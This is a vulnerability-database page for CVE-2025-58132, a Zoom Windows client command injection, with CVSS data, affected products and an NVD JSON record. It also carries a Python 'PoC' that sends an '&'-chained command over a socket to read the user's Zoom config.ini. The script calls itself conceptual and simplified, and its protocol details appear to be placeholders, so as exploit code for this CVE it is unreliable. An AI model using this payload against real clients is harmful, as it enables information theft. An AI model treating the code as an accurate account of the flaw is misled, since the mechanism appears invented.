Security Vulnerability Report
中文
CVE-2025-58132 CVSS 4.1 MEDIUM

CVE-2025-58132

Published: 2025-10-15 17:16:00
Last Modified: 2025-10-21 19:32:07
Source: [email protected]

Description

Command injection in some Zoom Clients for Windows may allow an authenticated user to conduct a disclosure of information via network access.

CVSS Details

CVSS Score
4.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:zoom:meeting_software_development_kit:*:*:*:*:*:windows:*:* - VULNERABLE
cpe:2.3:a:zoom:rooms:*:*:*:*:*:windows:*:* - VULNERABLE
cpe:2.3:a:zoom:workplace_desktop:*:*:*:*:*:windows:*:* - VULNERABLE
cpe:2.3:a:zoom:workplace_virtual_desktop_infrastructure:*:*:*:*:*:windows:*:* - VULNERABLE
cpe:2.3:a:zoom:workplace_virtual_desktop_infrastructure:*:*:*:*:*:windows:*:* - VULNERABLE
Zoom Clients for Windows(影响特定版本,具体版本范围请参考Zoom官方安全公告ZSB-25038)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-58132 - Zoom Windows Client Command Injection PoC # This is a conceptual PoC demonstrating the command injection vulnerability # in Zoom Clients for Windows that leads to information disclosure. import socket import struct # Zoom client communication simulation # The vulnerability exists in how the client processes certain network inputs # without proper sanitization of command characters. def craft_malicious_payload(target_command): """ Craft a malicious payload that exploits the command injection vulnerability in Zoom Windows client. The payload leverages the lack of input validation in the client's command processing logic, allowing injection of OS commands via specially crafted network data. """ # Windows command injection payload # Using & to chain commands after the legitimate one payload = f"legitimate_zoom_command & {target_command}" # Encode for network transmission encoded = payload.encode('utf-8') return encoded def exploit(target_host, target_port, auth_token): """ Exploit the CVE-2025-58132 vulnerability. Requires: - Valid authentication token (low privilege) - Target user interaction """ try: # Connect to Zoom client sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((target_host, target_port)) # Authenticate with low-privilege credentials auth_header = f"AUTH: {auth_token}\r\n" sock.send(auth_header.encode()) # Send malicious payload with command injection # Example: read system environment variables for info disclosure malicious_cmd = "type C:\\Users\\%USERNAME%\\AppData\\Roaming\\Zoom\\config.ini" payload = craft_malicious_payload(malicious_cmd) # Send via Zoom's messaging protocol (simplified) message = struct.pack('!I', len(payload)) + payload sock.send(message) # Receive response containing leaked information response = sock.recv(4096) return response.decode('utf-8', errors='ignore') except Exception as e: return f"Error: {e}" # Example usage: # result = exploit("target_zoom_client", 8801, "user_auth_token") # print(f"Leaked information: {result}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-58132", "sourceIdentifier": "[email protected]", "published": "2025-10-15T17:15:59.917", "lastModified": "2025-10-21T19:32:07.400", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Command injection in some Zoom Clients for Windows may allow an authenticated user to conduct a disclosure of information via network access."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:N/A:N", "baseScore": 4.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-77"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:zoom:meeting_software_development_kit:*:*:*:*:*:windows:*:*", "versionEndExcluding": "6.5.5", "matchCriteriaId": "1AC1A5EB-3E43-4888-9269-B86AC5C01C1F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zoom:rooms:*:*:*:*:*:windows:*:*", "versionEndExcluding": "6.5.5", "matchCriteriaId": "F2EFF630-7272-445F-9E7D-B456CC611DA8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zoom:workplace_desktop:*:*:*:*:*:windows:*:*", "versionEndExcluding": "6.5.5", "matchCriteriaId": "5A3D948D-B067-43ED-95D3-1811106AA9C7"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zoom:workplace_virtual_desktop_infrastructure:*:*:*:*:*:windows:*:*", "versionEndExcluding": "6.3.15", "matchCriteriaId": "B004FACC-69FE-49D1-B1A8-54A625E7E8C6"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zoom:workplace_virtual_desktop_infrastructure:*:*:*:*:*:windows:*:*", "versionStartIncluding": "6.4.0", "versionEndExcluding": "6.4.13", "matchCriteriaId": "399FCFB8-8F84-41F3-973A-3C99C1456C88"}]}]}], "references": [{"url": "https://www.zoom.com/en/trust/security-bulletin/zsb-25038", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.